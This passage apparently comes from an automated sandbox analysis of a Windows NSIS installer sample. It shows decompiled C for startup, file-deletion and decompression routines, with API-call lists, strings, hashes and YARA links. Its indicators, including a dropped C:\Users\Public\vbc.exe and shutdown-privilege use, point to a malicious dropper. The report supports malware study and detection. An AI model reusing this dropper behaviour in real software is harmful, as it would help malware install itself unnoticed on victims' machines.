							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403471
0x00403475
0x0040347d
0x00403481
0x00403486
0x00403492
0x0040349b
0x004034a0
0x004034a3
0x004034aa
0x004034b1
0x004034b1
0x004034aa
0x004034b3
0x004034b8
0x004034b9
0x004034c5
0x004034c9
0x004034cf
0x004034dd
0x004034e2
0x004034e9
0x004034ed
0x004034f1
0x004034f3
0x004034f3
0x004034f1
0x004034fb
0x00403502
0x00403508
0x0040351e
0x0040352e
0x00403533
0x00403539
0x00403540
0x0040354c
0x00403556
0x00403558
0x0040355a
0x0040355f
0x0040355f
0x0040356f
0x00403575
0x0040363e
0x0040363e
0x00403640
0x00403642
0x00000000
0x00000000
0x0040357e
0x00403581
0x00403589
0x00403589
0x0040358c
0x00403591
0x00403593
0x00403593
0x00403594
0x00403594
0x00403599
0x0040359c
0x0040362e
0x00403633
0x00403638
0x0040363b
0x0040363d
0x0040363d
0x0040363d
0x00000000
0x004035a2
0x004035a2
0x004035a3
0x004035a6
0x004035be
0x004035e9
0x004035eb
0x004035fe
0x00403629
0x0040362c
0x0040364a
0x0040364d
0x00403656
0x0040365b
0x00403661
0x0040366c
0x0040366e
0x00403673
0x00403675
0x004036cd
0x004036d2
0x004036dc
0x004036e3
0x004036e7
0x0040377b
0x0040377b
0x00403780
0x00403786
0x0040378b
0x004038af
0x004038b5
0x00403931
0x00403931
0x00403936
0x00403939
0x0040393b
0x0040393b
0x00403943
0x00403943
0x004038c5
0x004038cd
0x004038cf
0x004038d0
0x004038dd
0x004038f0
0x004038f8
0x004038fc
0x004038fc
0x00403904
0x00403909
0x00403910
0x0040391e
0x00403920
0x00403926
0x00403928
0x00000000
0x00000000
0x00000000
0x00403912
0x00403918
0x0040391a
0x0040391c
0x0040392a
0x0040392c
0x00000000
0x0040392c
0x00000000
0x0040391c
0x00403910
0x0040379a
0x004037a1
0x004037a1
0x004036f3
0x0040376b
0x0040376b
0x00403777
0x00000000
0x00403777
0x004036fc
0x00403700
0x00403736
0x00403736
0x00403738
0x00403740
0x004037b2
0x004037b4
0x004037bb
0x004037c3
0x004037c3
0x004037ce
0x004037d3
0x004037e2
0x004037e6
0x004037e7
0x004037f0
0x004037e9
0x004037e9
0x004037e9
0x004037f6
0x004037fc
0x00403802
0x0040380a
0x0040380a
0x00403818
0x0040381d
0x0040382f
0x00403837
0x0040383d
0x00403849
0x0040384f
0x00403859
0x0040386f
0x00403880
0x00403886
0x0040388d
0x00403890
0x00403896
0x00403896
0x0040388d
0x0040389a
0x004038a0
0x004038a0
0x004038a5
0x004038a5
0x00000000
0x004037e2
0x00403742
0x00403744
0x0040374f
0x00000000
0x00000000
0x00403757
0x00403762
0x00403767
0x00000000
0x00403767
0x0040372b
0x0040372d
0x00403731
0x00403734
0x00000000
0x00000000
0x00000000
0x00403734
0x00000000
0x0040372d
0x0040367d
0x00403689
0x0040368e
0x00403693
0x00403695
0x00000000
0x00000000
0x0040369d
0x004036a5
0x004036b6
0x004036be
0x004036c0
0x004036c5
0x004036c7
0x00000000
0x00000000
0x00000000
0x004036c7
0x00000000
0x0040362c
0x004035ed
0x004035f0
0x004035f3
0x004035f9
0x004035f9
0x004035f9
0x004035f9
0x00000000
0x004035f9
0x004035f5
0x004035f7
0x00000000
0x00000000
0x00000000
0x004035f7
0x004035a8
0x004035ab
0x004035ae
0x004035b4
0x004035b4
0x00000000
0x004035b4
0x004035b0
0x004035b2
0x00000000
0x00000000
0x00000000
0x004035b2
0x00000000
0x00000000
0x00000000
0x00403583
0x00403583
0x00403583
0x00403584
0x00403584
0x00000000
0x00403583
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403486
GetVersion.KERNEL32 ref: 0040348C
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
OleInitialize.OLE32(00000000), ref: 00403502
SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
CharNextA.USER32(00000000), ref: 0040356F
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366C
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040369D
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2

Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E

Part of subcall function 00403A3B: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754), ref: 00403B2B
Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
Part of subcall function 00403A3B: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403B92
Part of subcall function 00403A3B: RegisterClassA.USER32(00423EE0), ref: 00403BCF

Part of subcall function 00403949: CloseHandle.KERNEL32(00000184), ref: 0040395B
Part of subcall function 00403949: CloseHandle.KERNEL32(00000188), ref: 0040396F

OleUninitialize.OLE32 ref: 00403780
ExitProcess.KERNEL32 ref: 004037A1
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
ExitProcess.KERNEL32 ref: 00403943

Part of subcall function 00405944: MessageBoxIndirectA.USER32 ref: 0040599F

Strings

"C:\Users\Public\vbc.exe" , xrefs: 00403539, 0040353F, 004036F6
Low, xrefs: 0040369F
C:\Users\Public, xrefs: 004037D3, 004037D8, 00403804
.tmp, xrefs: 004037C8
1033, xrefs: 004036CD
Error launching installer, xrefs: 00403738
", xrefs: 00403594
C:\Users\user\AppData\Local\Temp, xrefs: 00403651, 00403752, 004037FC, 00403805
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403475
TEMP, xrefs: 004036B1
C:\Users\Public\vbc.exe, xrefs: 0040385E
\Temp, xrefs: 00403683
NSIS Error, xrefs: 00403524
SeShutdownPrivilege, xrefs: 004038D7
UXTHEME, xrefs: 004034B3, 004034B8, 004034BE
~nsu, xrefs: 004037AC
C:\Users\user\AppData\Local\Temp\, xrefs: 00403661, 00403666, 0040367C, 00403688, 00403697, 004036A4, 004036B0, 004036B8, 004037B1, 004037C2, 004037CD, 004037D9, 004037E6, 004037F5, 004038A4
C:\Users\user\AppData\Local\Temp, xrefs: 0040375D
TMP, xrefs: 004036B9

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 538718688-1344886843
Opcode ID: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
Opcode Fuzzy Hash: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004059F0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CAE(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247e8 =  *0x4247e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406228(0x421d58, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C07(_t73);
					} else {
						lstrcatA(0x421d58, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x421d58,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406228(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059A8(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040534F(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247e8 =  *0x4247e8 + 1;
										} else {
											E0040534F(0xfffffff1, _t73);
											E00406007(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F0(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d58 - 0x5c;
					if( *0x421d58 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040659C(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC0(_t73);
							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040534F(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040534F(0xfffffff1, _t73);
							return E00406007(_t72, _t73, 0);
						}
						L33:
						 *0x4247e8 =  *0x4247e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004059fa
0x004059ff
0x00405a08
0x00405a0b
0x00405a13
0x00405a16
0x00405a19
0x00405a21
0x00405a23
0x00405a24
0x00000000
0x00405a24
0x00405a2f
0x00405a32
0x00405a32
0x00405a32
0x00405a36
0x00405a49
0x00405a50
0x00405a55
0x00405a59
0x00405a69
0x00405a5b
0x00405a61
0x00405a61
0x00405a6e
0x00405a71
0x00405a7c
0x00405a82
0x00405a87
0x00405a97
0x00405a99
0x00405a9f
0x00405aa2
0x00405aa5
0x00405b5d
0x00405b5d
0x00405b61
0x00405b63
0x00405b63
0x00405b63
0x00405b63
0x00000000
0x00000000
0x00000000
0x00000000
0x00405aab
0x00405aab
0x00405ab4
0x00405aba
0x00405abf
0x00405ac2
0x00405ac4
0x00405ac8
0x00405aca
0x00405aca
0x00405ac8
0x00405acd
0x00405ad0
0x00405ae3
0x00405ae5
0x00405aea
0x00405af1
0x00405b0c
0x00405b11
0x00405b13
0x00405b37
0x00405b15
0x00405b15
0x00405b18
0x00405b2c
0x00405b1a
0x00405b1d
0x00405b25
0x00405b25
0x00405b18
0x00405af3
0x00405af9
0x00405afb
0x00405b01
0x00405b01
0x00405afb
0x00000000
0x00405af1
0x00405ad2
0x00405ad5
0x00405ad7
0x00000000
0x00000000
0x00405ad9
0x00405adb
0x00000000
0x00000000
0x00405add
0x00405ae1
0x00000000
0x00000000
0x00000000
0x00405b3c
0x00405b46
0x00405b4c
0x00405b4c
0x00405b57
0x00000000
0x00405b57
0x00405a73
0x00405a7a
0x00000000
0x00000000
0x00000000
0x00405a38
0x00405a38
0x00405a3a
0x00405b67
0x00405b69
0x00405b6c
0x00405bbd
0x00405bbd
0x00405bbd
0x00405b6e
0x00405b71
0x00405b7c
0x00405b81
0x00405b83
0x00000000
0x00000000
0x00405b86
0x00405b92
0x00405b97
0x00405b99
0x00000000
0x00405bb4
0x00405b9b
0x00405b9e
0x00000000
0x00000000
0x00405ba3
0x00000000
0x00405baa
0x00405b73
0x00405b73
0x00000000
0x00405b73
0x00405a40
0x00405a43
0x00000000
0x00000000
0x00000000
0x00405a43

APIs

DeleteFileA.KERNELBASE(?,?,76712754,766F13E0,00000000), ref: 00405A19
lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A61
lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A82
lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A88
FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A99
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
FindClose.KERNEL32(00000000), ref: 00405B57

Strings

"C:\Users\Public\vbc.exe" , xrefs: 004059F0
\*.*, xrefs: 00405A5B

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\Public\vbc.exe" $\*.*
API String ID: 2035342205-1024247051
Opcode ID: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
Opcode Fuzzy Hash: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69

Uniqueness

Uniqueness Score: -1.00%

Function 00406925, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406925() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
